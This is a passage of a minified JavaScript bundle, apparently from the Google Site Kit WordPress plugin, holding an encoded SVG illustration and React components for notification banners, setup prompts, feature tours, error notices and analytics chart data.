NyAxMzQuMDIgMTUzLjIwMSAxMDYuMTIzIDE4MS4zNTcgMTE0LjU3MkMyMDkuNTEzIDEyMy4wMiAyMTMuNDY4IDE2MS41NDUgMjM1Ljg1NyAxNjkuOTI1QzI1OC4yNDUgMTc4LjMwNiAzMDMuMDY4IDE3MS41MTUgMzE2LjAwMiAxMzguMTM1QzMyOC45MzYgMTA0Ljc1NCAzMTIuMTY3IDgzLjY1MjkgMjg3LjY1MiA3Mi4xNjk0QzI2My4xMzYgNjAuNjg1OSAyNjguOTc2IDM2Ljc4MzYgMjM0LjE2NiAyNy44MDA5QzE5OS4zNTcgMTguODE4MiAxNzguNjY1IDQxLjI2NTEgMTQwLjE2NSAzMC43OTI3QzEwMS42NjUgMjAuMzIwNCA2My44NTc4IDYxLjIxMzEgODQuODU3NSA5Ny42MTY2WiIgZmlsbD0iI0ZGREVEMyIvPgo8ZyBmaWx0ZXI9InVybCgjZmlsdGVyMF9kXzI3MDVfMTc2MzMpIj4KPHJlY3QgeD0iMTI3LjY2NiIgeT0iMzcuODQxMSIgd2lkdGg9IjEyOCIgaGVpZ2h0PSIxMjguMTk0IiByeD0iNi45ODI1MiIgZmlsbD0iI0VCRUVGMCIvPgo8bWFzayBpZD0ibWFzazBfMjcwNV8xNzYzMyIgc3R5bGU9Im1hc2stdHlwZTphbHBoYSIgbWFza1VuaXRzPSJ1c2VyU3BhY2VPblVzZSIgeD0iMTI3IiB5PSIzNyIgd2lkdGg9IjEyOSIgaGVpZ2h0PSIxMzEiPgo8cmVjdCB4PSIxMjcuNjY2IiB5PSIzNy44NDExIiB3aWR0aD0iMTI4IiBoZWlnaHQ9IjEyOS43OSIgcng9IjYuOTgyNTIiIGZpbGw9IiNERUUzRTYiLz4KPC9tYXNrPgo8ZyBtYXNrPSJ1cmwoI21hc2swXzI3MDVfMTc2MzMpIj4KPHJlY3QgeD0iMTM2LjIiIHk9Ijk3LjQxNjkiIHdpZHRoPSIxMTAuNCIgaGVpZ2h0PSIzMC44NTE4IiByeD0iMy43NTEyOCIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMzYuMiIgeT0iODMuMDU0NiIgd2lkdGg9IjExMC40IiBoZWlnaHQ9IjMwLjg1MTgiIHJ4PSIzLjc1MTI4IiBmaWxsPSIjRjNGNUY3Ii8+CjxwYXRoIGQ9Ik0xMzYuMiAxMzkuNDY3QzEzNi4yIDEzNy4zOTUgMTM3Ljg3OSAxMzUuNzE2IDEzOS45NTEgMTM1LjcxNkgyNDIuODQ5QzI0NC45MiAxMzUuNzE2IDI0Ni42IDEzNy4zOTUgMjQ2LjYgMTM5LjQ2N1YxNjUuOTM1SDEzNi4yVjEzOS40NjdaIiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHdpZHRoPSIzMiIgaGVpZ2h0PSIxOC44OTY2IiByeD0iMi4zMTU2OSIgdHJhbnNmb3JtPSJtYXRyaXgoMSAwIDAgLTEgMjE0LjU5OSA3NS40NDY3KSIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB3aWR0aD0iMzIiIGhlaWdodD0iMTguODk2NiIgcng9IjIuMzE1NjkiIHRyYW5zZm9ybT0ibWF0cml4KDEgMCAwIC0xIDE3NS4xMzMgNzUuNDQ3NikiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3Qgd2lkdGg9IjMyIiBoZWlnaHQ9IjE4Ljg5NjYiIHJ4PSIyLjMxNTY5IiB0cmFuc2Zvcm09Im1hdHJpeCgxIDAgMCAtMSAxMzUuNjY2IDc1LjQ0NzYpIiBmaWxsPSIjRjNGNUY3Ii8+CjwvZz4KPHBhdGggZD0iTTEyNy42NjYgNDQuODU2N0MxMjcuNjY2IDQxLjAwMDQgMTMwLjc5MyAzNy44NzQyIDEzNC42NDkgMzcuODc0MkgyNDguNTI2QzI1Mi4zODIgMzcuODc0MiAyNTUuNTA4IDQxLjAwMDQgMjU1LjUwOCA0NC44NTY3VjQ4LjQyNjNIMTI3LjY2NlY0NC44NTY3WiIgZmlsbD0id2hpdGUiLz4KPHJlY3QgeD0iMTMyLjk1NiIgeT0iNDEuMzkxNSIgd2lkdGg9IjMuNTI2NjciIGhlaWdodD0iMy41MTczNyIgcng9IjEuNzU4NjgiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3QgeD0iMTM4LjI0NyIgeT0iNDEuMzkxNSIgd2lkdGg9IjMuNTI2NjciIGhlaWdodD0iMy41MTczNyIgcng9IjEuNzU4NjgiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3QgeD0iMTQzLjU4IiB5PSI0MS4zOTE1IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUxNzM3IiByeD0iMS43NTg2OCIgZmlsbD0iI0YzRjVGNyIvPgo8L2c+CjxjaXJjbGUgY3g9IjE5MS42NjYiIGN5PSIxMDAuOTE1IiByPSIxNi44IiBmaWxsPSIjQUM0MjIwIiBzdHJva2U9IndoaXRlIiBzdHJva2Utd2lkdGg9IjIuNjY2NjciLz4KPHBhdGggZD0iTTE5Mi45MTQgOTMuOTgxOEgxOTAuNDE4QzE5MC4wOTIgOTMuOTgxOCAxODkuODQzIDk0LjI3MTQgMTg5Ljg5MSA5NC41OTM2TDE5MS4xMzkgMTAyLjk3M0MxOTEuMjI5IDEwMy41OCAxOTIuMTA0IDEwMy41OCAxOTIuMTk0IDEwMi45NzNMMTkzLjQ0MiA5NC41OTM2QzE5My40OSA5NC4yNzE0IDE5My4yNCA5My45ODE4IDE5Mi45MTQgOTMuOTgxOFoiIGZpbGw9IiNGRkRFRDMiLz4KPGNpcmNsZSBjeD0iMTkxLjY2NiIgY3k9IjEwNi43ODIiIHI9IjEuNiIgZmlsbD0iI0ZGREVEMyIvPgo8ZGVmcz4KPGZpbHRlciBpZD0iZmlsdGVyMF9kXzI3MDVfMTc2MzMiIHg9IjExOS4xMzMiIHk9IjMxLjQ0MTEiIHdpZHRoPSIxNDUuMDY3IiBoZWlnaHQ9IjE0NS4yNjEiIGZpbHRlclVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY29sb3ItaW50ZXJwb2xhdGlvbi1maWx0ZXJzPSJzUkdCIj4KPGZlRmxvb2QgZmxvb2Qtb3BhY2l0eT0iMCIgcmVzdWx0PSJCYWNrZ3JvdW5kSW1hZ2VGaXgiLz4KPGZlQ29sb3JNYXRyaXggaW49IlNvdXJjZUFscGhhIiB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMTI3IDAiIHJlc3VsdD0iaGFyZEFscGhhIi8+CjxmZU9mZnNldCBkeT0iMi4xMzMzMyIvPgo8ZmVHYXVzc2lhbkJsdXIgc3RkRGV2aWF0aW9uPSI0LjI2NjY3Ii8+CjxmZUNvbXBvc2l0ZSBpbjI9ImhhcmRBbHBoYSIgb3BlcmF0b3I9Im91dCIvPgo8ZmVDb2xvck1hdHJpeCB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMC4xNSAwIi8+CjxmZUJsZW5kIG1vZGU9Im5vcm1hbCIgaW4yPSJCYWNrZ3JvdW5kSW1hZ2VGaXgiIHJlc3VsdD0iZWZmZWN0MV9kcm9wU2hhZG93XzI3MDVfMTc2MzMiLz4KPGZlQmxlbmQgbW9kZT0ibm9ybWFsIiBpbj0iU291cmNlR3JhcGhpYyIgaW4yPSJlZmZlY3QxX2Ryb3BTaGFkb3dfMjcwNV8xNzYzMyIgcmVzdWx0PSJzaGFwZSIvPgo8L2ZpbHRlcj4KPC9kZWZzPgo8L3N2Zz4K";var D=t(62540);const y={INFO:"info",ERROR:"error",WARNING:"warning"};function BannerNotification({notificationID:e,type:i=y.INFO,learnMoreLink:t,dismissButton:o,ctaButton:s,gaTrackingEventArgs:a,...c}){const g=(0,l.A)(e,a?.category),{dismissNotification:u}=(0,r.useDispatch)(I.D);let z=c?.svg;return z||i===y.INFO||(z={desktop:void 0,mobile:void 0,verticalPosition:"center"},i===y.WARNING&&(z.desktop=j),i===y.ERROR&&(z.desktop=d)),(0,D.jsx)("div",{className:n()("googlesitekit-banner-notification",`googlesitekit-banner-notification--${i}`),children:(0,D.jsx)(N.xA,{className:"googlesitekit-page-content",children:(0,D.jsx)(N.fI,{children:(0,D.jsx)(N.fh,{size:12,children:(0,D.jsx)(M.A,{learnMoreLink:t&&{...t,onClick:async function(e){g.clickLearnMore(a?.label,a?.value),await(t?.onClick?.(e))}},dismissButton:o&&{...o,onClick:async function(i){await(o?.onClick?.(i)),g.dismiss(a?.label,a?.value),u(e,{...o?.dismissOptions})}},ctaButton:s&&{...s,onClick:async function(i){g.confirm(a?.label,a?.value),await(s?.onClick?.(i)),s?.dismissOnClick&&u(e,{...s?.dismissOptions})}},svg:z,...c})})})})})}BannerNotification.propTypes={notificationID:a().string.isRequired,type:a().oneOf(Object.values(y)),titleIcon:a().node,title:a().string,description:a().oneOfType([a().string,a().node]),learnMoreLink:a().shape(c.A.propTypes),dismissButton:a().shape(u.A.propTypes),ctaButton:a().shape(g.A.propTypes),gaTrackingEventArgs:a().shape({category:a().string,label:a().string,value:a().number})}},68761:(e,i,t)=>{t.d(i,{A:()=>a});var o=t(63696),n=t(62659),s=t(6109);function a(e,i,{viewAction:t="view_notification",confirmAction:a="confirm_notification",dismissAction:r="dismiss_notification",clickLearnMoreAction:I="click_learn_more_link"}={}){const l=(0,n.A)(),M=null!=i?i:`${l}_${e}`;return{view:(0,o.useCallback)((...e)=>(0,s.sx)(M,t,...e),[M,t]),confirm:(0,o.useCallback)((...e)=>(0,s.sx)(M,a,...e),[M,a]),dismiss:(0,o.useCallback)((...e)=>(0,s.sx)(M,r,...e),[M,r]),clickLearnMore:(0,o.useCallback)((...e)=>(0,s.sx)(M,I,...e),[M,I])}}},68832:(e,i,t)=>{t.d(i,{A:()=>s});var o=t(35470),n=t(11999);function s(e,i){return(0,o.A)(t=>{const{getValue:o}=t(n.s);return o(e,i)},[e,i])}},69782:(e,i,t)=>{t.d(i,{$t:()=>r,Oh:()=>c,S9:()=>M,XH:()=>a,ZC:()=>n,ZY:()=>I,gL:()=>o,mZ:()=>l,vZ:()=>s});const o="modules/tagmanager",n="account_create",s="container_create",a="web",r="amp",I="tagmanagerSetup",l="https://www.googleapis.com/auth/tagmanager.readonly",M="https://www.googleapis.com/auth/tagmanager.edit.containers",c="SETUP_WITH_ANALYTICS"},70301:(e,i,t)=>{t.d(i,{M:()=>o});const o="core/location"},71189:(e,i,t)=>{t.d(i,{A:()=>CTAButton});var o=t(62688),n=t.n(o),s=t(49383),a=t(83366),r=t(62540);function CTAButton({label:e,ariaLabel:i,disabled:t,inProgress:o,onClick:n,href:I,external:l=!1,hideExternalIndicator:M=!1}){if(!e||!n&&!I)return null;let c;return l&&!M&&(c=(0,r.jsx)(a.A,{width:14,height:14})),(0,r.jsx)(s.SpinnerButton,{className:"googlesitekit-banner__cta","aria-label":i,disabled:t||o,isSaving:o,onClick:n,href:I,target:l?"_blank":void 0,trailingIcon:c,children:e})}CTAButton.propTypes={label:n().string,ariaLabel:n().string,disabled:n().bool,inProgress:n().bool,onClick:n().func,href:n().string,dismissOnClick:n().bool,dismissOptions:n().shape({expiresInSeconds:n().number,skipHidingFromQueue:n().bool})}},71264:(e,i,t)=>{t.d(i,{Ay:()=>TourTooltips,R0:()=>j,ei:()=>D});var o=t(15844),n=t(36703),s=t(62688),a=t.n(s),r=t(82871),I=t(50539),l=t(7972),M=t(97345),c=t(65054),g=t(83202),u=t(62659),N=t(62540);const j={options:{arrowColor:"#3c7251",backgroundColor:"#3c7251",overlayColor:"rgba(0, 0, 0, 0.6)",textColor:"#fff",zIndex:2e4},spotlight:{border:"2px solid #3c7251",backgroundColor:"#fff"}},d={back:(0,r.__)("Back","google-site-kit"),close:(0,r.__)("Close","google-site-kit"),last:(0,r.__)("Got it","google-site-kit"),next:(0,r.__)("Next","google-site-kit")},D={disableAnimation:!0,styles:{arrow:{length:8,margin:56,spread:16},floater:{filter:"drop-shadow(rgba(60, 64, 67, 0.3) 0px 1px 2px) drop-shadow(rgba(60, 64, 67, 0.15) 0px 2px 6px)"}}},y={VIEW:"feature_tooltip_view",NEXT:"feature_tooltip_advance",PREV:"feature_tooltip_return",DISMISS:"feature_tooltip_dismiss",COMPLETE:"feature_tooltip_complete"};function TourTooltips({steps:e,tourID:i,gaEventCategory:s,isRepeatable:a,callback:r}){const z=`${i}-step`,m=`${i}-run`,{setValue:T}=(0,I.useDispatch)(l.n),{dismissTour:p,receiveCurrentTour:S}=(0,I.useDispatch)(M.oR),A=(0,I.useRegistry)(),x=(0,u.A)(),E=(0,I.useSelect)(e=>e(l.n).getValue(z)||0),h=(0,I.useSelect)(e=>e(l.n).getValue(m)&&!1===e(M.oR).isTourDismissed(i));(0,o.A)(function(){t.g.document.body.classList.add("googlesitekit-showing-feature-tour",`googlesitekit-showing-feature-tour--${i}`),T(m,!0)});const k=e.map(e=>({disableBeacon:!0,isFixed:!0,placement:"auto",...e}));return(0,N.jsx)(n.Ay,{callback:function(e){!function({index:e,action:i,lifecycle:t,size:o,status:a,type:r}){const I=e+1,l="function"==typeof s?s(x):s;r===n.qY.TOOLTIP&&t===n.VD.TOOLTIP?(0,c.sx)(l,y.VIEW,I):i===n.kl.CLOSE&&t===n.VD.COMPLETE?(0,c.sx)(l,y.DISMISS,I):i===n.kl.NEXT&&a===n.XQ.FINISHED&&r===n.qY.TOUR_END&&o===I&&(0,c.sx)(l,y.COMPLETE,I),t===n.VD.COMPLETE&&a!==n.XQ.FINISHED&&(i===n.kl.PREV&&(0,c.sx)(l,y.PREV,I),i===n.kl.NEXT&&(0,c.sx)(l,y.NEXT,I))}(e);const{action:o,index:I,status:l,step:M,type:g}=e,u=o===n.kl.CLOSE,N=!u&&[n.qY.STEP_AFTER,n.qY.TARGET_NOT_FOUND].includes(g),j=[n.XQ.FINISHED,n.XQ.SKIPPED].includes(l),d=u&&g===n.qY.STEP_AFTER,D=j||d;if(n.qY.STEP_BEFORE===g){let e=M.target;"string"==typeof M.target&&(e=t.g.document.querySelector(M.target)),e?.scrollIntoView?.({block:"center"})}N?function(e,i){T(z,e+(i===n.kl.PREV?-1:1))}(I,o):D&&(t.g.document.body.classList.remove("googlesitekit-showing-feature-tour",`googlesitekit-showing-feature-tour--${i}`),a?(T(m,!1),T(z,null),S(null)):p(i)),r&&r(e,A)},floaterProps:D,locale:d,run:h,stepIndex:E,steps:k,styles:j,tooltipComponent:g.A,continuous:!0,disableOverlayClose:!0,disableScrolling:!0,showProgress:!0})}TourTooltips.propTypes={steps:a().arrayOf(a().object).isRequired,tourID:a().string.isRequired,gaEventCategory:a().oneOfType([a().string,a().func]).isRequired,isRepeatable:a().bool,callback:a().func}},72050:(e,i,t)=>{t.d(i,{A:()=>SetupCTA});var o=t(4452),n=t.n(o),s=t(62688),a=t.n(s),r=t(63696),I=t(50539),l=t(8732),M=t(68761),c=t(83891),g=t(41671),u=t(71189),N=t(61983),j=t(10740),d=t(49383),D=t(62540);function SetupCTA({notificationID:e,title:i,description:t,errorText:o,helpText:s,learnMoreLink:a,dismissButton:g,ctaButton:u,svg:N,footer:y,gaTrackingEventArgs:z,waitingProgress:m,...T}){const p=(0,M.A)(e,z?.category),{dismissNotification:S}=(0,I.useDispatch)(l.D);return(0,D.jsxs)(r.Fragment,{children:[!!m&&(0,D.jsx)(d.ProgressBar,{className:"googlesitekit-banner__progress-bar",...m}),(0,D.jsx)("div",{className:n()("googlesitekit-widget-context",{"googlesitekit-widget-context--with-progress-bar":!!m}),children:(0,D.jsx)(j.xA,{children:(0,D.jsx)(j.fI,{children:(0,D.jsx)(j.fh,{size:12,children:(0,D.jsx)(c.A,{className:"googlesitekit-banner--setup-cta",title:i,description:t,errorText:o,helpText:s,learnMoreLink:a&&{...a,onClick:async function(e){p.clickLearnMore(z?.label,z?.value),await(a?.onClick?.(e))}},dismissButton:g&&{...g,onClick:async function(i){await(g?.onClick?.(i)),p.dismiss(z?.label,z?.value),S(e,{...g?.dismissOptions})}},ctaButton:u&&{...u,onClick:async function(i){p.confirm(z?.label,z?.value),await(u?.onClick?.(i)),u?.dismissOnClick&&S(e,{...u?.dismissOptions})}},svg:N,footer:y,...T})})})})})]})}SetupCTA.propTypes={notificationID:a().string,title:a().string,description:a().oneOfType([a().string,a().node]),errorText:a().string,helpText:a().string,learnMoreLink:a().shape(g.A.propTypes),dismissButton:a().shape(N.A.propTypes),ctaButton:a().shape(u.A.propTypes),svg:a().shape({desktop:a().elementType,mobile:a().elementType,verticalPosition:a().oneOf(["top","center","bottom"])}),footer:a().node,gaTrackingEventArgs:a().shape({category:a().string,label:a().string,value:a().number}),waitingProgress:a().shape(d.ProgressBar.propTypes)}},72545:(e,i,t)=>{t.d(i,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,n=t(63696);function s(){return s=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},s.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>n.createElement("svg",s({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 14 14"},e),o||(o=n.createElement("path",{fill:"currentColor",d:"M14 1.41 12.59 0 7 5.59 1.41 0 0 1.41 5.59 7 0 12.59 1.41 14 7 8.41 12.59 14 14 12.59 8.41 7z"})))},73198:(e,i,t)=>{t.d(i,{A:()=>ErrorNotice});var o=t(62688),n=t.n(o),s=t(63696),a=t(82871),r=t(84024),I=t(50539),l=t(13137),M=t(25797),c=t(6109),g=t(62540);function ErrorNotice({className:e,error:i,hasButton:t=!1,storeName:o,message:n=i.message,noPrefix:u=!1,skipRetryMessage:N,hideIcon:j=!1}){const d=(0,I.useDispatch)(),D=(0,I.useSelect)(e=>o?e(o).getSelectorDataForError(i):null),y=(0,s.useCallback)(()=>{d(D.storeName).invalidateResolution(D.name,D.args)},[d,D]);if(!n||(0,l.G)(i))return null;const z=t&&(0,l.vl)(i,D);let m=n;t||N||(m=(0,a.sprintf)(/* translators: %s: Error message from Google API. */ /* translators: %s: Error message from Google API. */ (0,a.__)("%s (Please try again.)","google-site-kit"),m)),u||(m=(0,a.sprintf)(/* translators: $%s: Error message */ /* translators: $%s: Error message */ (0,a.__)("Error: %s","google-site-kit"),m));const T=i?.data?.reconnectURL;T&&(0,r.m)(T)&&(m=(0,a.sprintf)(/* translators: 1: Original error message 2: Reconnect URL */ /* translators: 1: Original error message 2: Reconnect URL */ (0,a.__)('%1$s To fix this, <a href="%2$s">redo the plugin setup</a>.',"google-site-kit"),m,T));return(0,g.jsx)(M.A,{className:e,type:M.A.TYPES.ERROR,description:(0,g.jsx)("span",{dangerouslySetInnerHTML:(0,c.p9)(m,{ALLOWED_TAGS:["a"],ALLOWED_ATTR:["href"]})}),ctaButton:z?{label:(0,a.__)("Retry","google-site-kit"),onClick:y}:void 0,hideIcon:j})}ErrorNotice.propTypes={className:n().string,error:n().shape({message:n().string}),hasButton:n().bool,storeName:n().string,message:n().string,noPrefix:n().bool,skipRetryMessage:n().bool,hideIcon:n().bool}},73730:(e,i,t)=>{function o(e,i,t=()=>!0){return"string"==typeof e?t(e):!("object"!=typeof e||!i(e))||!!Array.isArray(e)&&e.every(e=>"string"==typeof e?t(e):"object"==typeof e&&i(e))}function n({startDate:e,endDate:i}){const t=e&&e.match(/^\d{4}-\d{2}-\d{2}$/),o=i&&i.match(/^\d{4}-\d{2}-\d{2}$/);return t&&o}function s(e){function i(e){const i=e.hasOwnProperty("fieldName")&&!!e.fieldName,t=e.hasOwnProperty("sortOrder")&&/(ASCENDING|DESCENDING)/i.test(e.sortOrder.toString());return i&&t}return Array.isArray(e)?e.every(e=>"object"==typeof e&&i(e)):"object"==typeof e&&i(e)}function a(e){return"string"==typeof e||!!Array.isArray(e)&&e.every(e=>"string"==typeof e)}t.d(i,{G4:()=>s,O5:()=>n,cX:()=>o,cq:()=>a})},74508:(e,i,t)=>{t.d(i,{s:()=>u});var o=t(4452),n=t.n(o),s=t(17243),a=t(82871),r=t(49746),I=t(6109),l=t(32091),M=t.n(l);var c=t(9616);function g(e,i){const t=[];return e.forEach(e=>{if(!e.metricValues)return;const{value:o}=e.metricValues[i],n=e.dimensionValues[0].value,s=(0,c.A)(n);t.push([s,o])}),t}function u(e,i,t,o,l=[(0,a.__)("Users","google-site-kit"),(0,a.__)("Sessions","google-site-kit"),(0,a.__)("Engagement Rate","google-site-kit"),(0,a.__)("Session Duration","google-site-kit")],c=[e=>parseFloat(e).toLocaleString(),e=>parseFloat(e).toLocaleString(),e=>(0,I.Eo)(e/100,{style:"percent",signDisplay:"never",maximumFractionDigits:2}),e=>(0,I.Eo)(e,"s")],u=[s.identity,s.identity,e=>100*e,s.identity]){const N=[...e?.rows||[]],j=N.length;if(2*t>j){const e=(0,I.XH)(o);for(let i=0;t>i;i++){const t=(e.getMonth()+1).toString(),o=e.getDate().toString(),n=e.getFullYear().toString()+(2>t.length?"0":"")+t+(2>o.length?"0":"")+o;if(i>j){const e=[{dimensionValues:[{value:n},{value:"date_range_0"}],metricValues:[{value:0},{value:0}]},{dimensionValues:[{value:n},{value:"date_range_1"}],metricValues:[{value:0},{value:0}]}];N.unshift(...e)}e.setDate(e.getDate()-1)}N.push({dimensionValues:[{value:"0"},{value:"date_range_0"}]},{dimensionValues:[{value:"0"},{value:"date_range_1"}]})}const d=l[i]===(0,a.__)("Session Duration","google-site-kit"),D=d?"timeofday":"number",y=[[{type:"date",label:(0,a.__)("Day","google-site-kit")},{type:"string",role:"tooltip",p:{html:!0}},{type:D,label:l[i]},{type:D,label:(0,a.__)("Previous period","google-site-kit")}]],{compareRange:z,currentRange:m}=function(e,{dateRangeLength:i}){function t(i){return e.filter(({dimensionValues:[,e]})=>e.value===i)}M()(Array.isArray(e),"report must be an array to partition."),M()(Number.isInteger(i)&&i>0,"dateRangeLength must be a positive integer.");const o=-1*i;return{currentRange:t("date_range_0").slice(o),compareRange:t("date_range_1").slice(2*o,o)}}(N,{dateRangeLength:t}),T=g(m,i),p=g(z,i),S=(0,r.JK)(),A={weekday:"short",month:"short",day:"numeric"};return T.forEach((e,t)=>{if(!e[0]||!e[1]||!p[t])return;const o=u[i],s=o(e[1]),r=o(p[t][1]),M=parseFloat(r),g=(0,I.Cn)(s,M),N=(0,I.vY)(g),j=(0,a.sprintf)(/* translators: 1: date for user stats, 2: previous date for user stats comparison */ /* translators: 1: date for user stats, 2: previous date for user stats comparison */ (0,a._x)("%1$s vs %2$s","Date range for chart tooltip","google-site-kit"),e[0].toLocaleDateString(S,A),p[t][0].toLocaleDateString(S,A)),D=(0,a.sprintf)(/* translators: 1: selected stat label, 2: numeric value of selected stat, 3: up or down arrow , 4: different change in percentage */ /* translators: 1: selected stat label, 2: numeric value of selected stat, 3: up or down arrow , 4: different change in percentage */ (0,a._x)("%1$s: <strong>%2$s</strong> <em>%3$s %4$s</em>","Stat information for chart tooltip","google-site-kit"),l[i],c[i](s),N,(0,I.Eo)(Math.abs(g),"%"));y.push([e[0],`<div class="${n()("googlesitekit-visualization-tooltip",{"googlesitekit-visualization-tooltip--up":g>0,"googlesitekit-visualization-tooltip--down":g<0})}">\n\t\t\t\t<p>${j}</p>\n\t\t\t\t<p>${D}</p>\n\t\t\t</div>`,d?(0,I.vH)(s):s,d?(0,I.vH)(r):r])}),y}},76729:(e,i,t)=>{t.d(i,{Q:()=>o});const o="emailReportingUserSettingsSelectionPanelOpened"},76984:(e,i,t)=>{t.d(i,{Q:()=>o});const o={NEW:"new",SUCCESS:"success",WARNING:"warning",INFO:"info",INFO_ALT:"info-alt",ERROR:"error"}},78990:(e,i,t)=>{t.d(i,{P9:()=>D,k:()=>N,mR:()=>d});var o=t(32091),n=t.n(o),s=t(17243),a=t(50539),r=t.n(a),I=t(49993),l=t(6109);const M="CREATE_SNAPSHOT",c="DELETE_SNAPSHOT",g="RESTORE_SNAPSHOT",u="SET_STATE_FROM_SNAPSHOT";function N(e,{keysToSnapshot:i}={}){n()(e,"storeName is required to create a snapshot store.");const t={},o={*deleteSnapshot(){return yield{payload:{},type:c}},*restoreSnapshot(e={}){const{clearAfterRestore:i=!0}=e,{cacheHit:t,value:o}=yield{payload:{},type:g};return t&&(yield{payload:{snapshot:o},type:u},i&&(yield{payload:{},type:c})),t},*createSnapshot(){return yield{payload:{},type:M}}},r={[c]:()=>(0,I.LD)(`datastore::cache::${e}`),[M]:(0,a.createRegistryControl)(t=>()=>{const o=t.stores[e].store.getState(),n=i?.length>0?(0,s.pick)(o,i):o;return(0,I.SO)(`datastore::cache::${e}`,n)}),[g]:()=>(0,I.Gq)(`datastore::cache::${e}`,l.Jg)};return{initialState:t,actions:o,controls:r,reducer:function(e=t,{type:o,payload:n}){if(o===u){const{snapshot:t}=n,{error:o,...s}=t;return i?.length>0?{...e,...s}:s}return e}}}function j(e=r()){return Object.values(e.stores).filter(e=>Object.keys(e.getActions()).includes("restoreSnapshot"))}function d(e=r()){return Promise.all(j(e).map(e=>e.getActions().createSnapshot()))}function D(e=r()){return Promise.all(j(e).map(e=>e.getActions().restoreSnapshot()))}},82871:e=>{e.exports=googlesitekit.i18n},83202:(e,i,t)=>{t.d(i,{A:()=>TourTooltip});var o=t(28056),n=t.n(o),s=t(4452),a=t.n(s),r=t(62688),I=t.n(r),l=t(82871),M=t(49383);var c=t(72545),g=t(33052),u=t(62540);function TourTooltip({backProps:e,closeProps:i,index:t,primaryProps:s,size:r,step:I,tooltipProps:N}){const j=r>1?function(e){return new Array(null!=e?e:0).fill().map((e,i)=>i)}(r):[];function d(e){return a()("googlesitekit-tooltip-indicator",{active:e===t})}return(0,u.jsx)("div",{className:a()("googlesitekit-tour-tooltip",I.className),...N,children:(0,u.jsxs)(n(),{className:"googlesitekit-tooltip-card",children:[(0,u.jsxs)("div",{className:"googlesitekit-tooltip-body",children:[(0,u.jsx)(g.A,{as:"h2",className:"googlesitekit-tooltip-title",size:"medium",type:"title",children:I.title}),(0,u.jsx)("div",{className:"googlesitekit-tooltip-content",children:I.content})]}),(0,u.jsxs)(o.CardActions,{className:"googlesitekit-tooltip-actions",children:[(0,u.jsx)("ul",{className:"googlesitekit-tooltip-indicators",children:j.map(e=>(0,u.jsx)("li",{className:d(e)},`indicator-${e}`))}),(0,u.jsxs)("div",{className:"googlesitekit-tooltip-buttons",children:[0!==t&&(0,u.jsx)(M.Button,{className:"googlesitekit-tooltip-button",text:!0,...e,children:e.title}),I.cta,s.title&&(0,u.jsx)(M.Button,{className:"googlesitekit-tooltip-button",text:!0,...s,children:s.title})]})]}),(0,u.jsx)(M.Button,{className:"googlesitekit-tooltip-close",icon:(0,u.jsx)(c.A,{width:"14",height:"14"}),onClick:i.onClick,"aria-label":(0,l.__)("Close","google-site-kit"),text:!0,hideTooltipTitle:!0})]})})}TourTooltip.propTypes={backProps:I().object.isRequired,closeProps:I().object.isRequired,index:I().number.isRequired,isLastStep:I().bool.isRequired,primaryProps:I().object.isRequired,size:I().number.isRequired,step:I().shape({content:I().node,title:I().node,cta:I().oneOfType([I().element,I().bool]),className:I().string}).isRequired,tooltipProps:I().object.isRequired}},83366:(e,i,t)=>{t.d(i,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,n=t(63696);function s(){return s=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},s.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>n.createElement("svg",s({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),o||(o=n.createElement("path",{d:"M5 21a2 2 0 0 1-1.425-.575A2 2 0 0 1 3 19V5q0-.825.575-1.4Q4.175 3 5 3h7v2H5v14h14v-7h2v7q0 .825-.6 1.425Q19.825 21 19 21zm4.7-5.3-1.4-1.4L17.6 5H14V3h7v7h-2V6.4z"})))},83880:(e,i,t)=>{t.d(i,{A:()=>l});var o=t(62688),n=t.n(o),s=t(97513),a=t(33052),r=t(8513),I=t(62540);function l({type:e=r.SZ,size:i,children:t,...o}){const n=(0,s.dv)();return(0,I.jsx)(a.A,{as:"p",type:e,size:i||(n===s.mp?r.Kk:r.Yw),...o,children:t})}l.propTypes={type:n().oneOf(r.tT),size:n().oneOf(r.oJ)}},83891:(e,i,t)=>{t.d(i,{A:()=>d});var o=t(4452),n=t.n(o),s=t(62688),a=t.n(s),r=t(63696),I=t(97513),l=t(62540);function TitleIcon({className:e,children:i}){return(0,l.jsx)("div",{className:n()("googlesitekit-banner__title-icon",e),children:i})}function Title({className:e,children:i}){return(0,l.jsx)("p",{className:n()("googlesitekit-banner__title",e),children:i})}TitleIcon.propTypes={className:a().string,children:a().node},Title.propTypes={className:a().string,children:a().node};var M=t(6109),c=t(41671);function Description({className:e,description:i,learnMoreLink:t,additionalDescription:o,children:s}){return(0,l.jsxs)("div",{className:n()("googlesitekit-banner__description",e),children:[(0,r.isValidElement)(i)?i:"string"==typeof i?(0,l.jsx)("span",{dangerouslySetInnerHTML:(0,M.p9)(i,{ALLOWED_TAGS:["strong","em","br","a"],ALLOWED_ATTR:["href"]})}):i," ",t?.href&&(0,l.jsx)(c.A,{...t}),o&&(0,l.jsx)("div",{className:"googlesitekit-banner__additional-description",children:o}),s]})}function 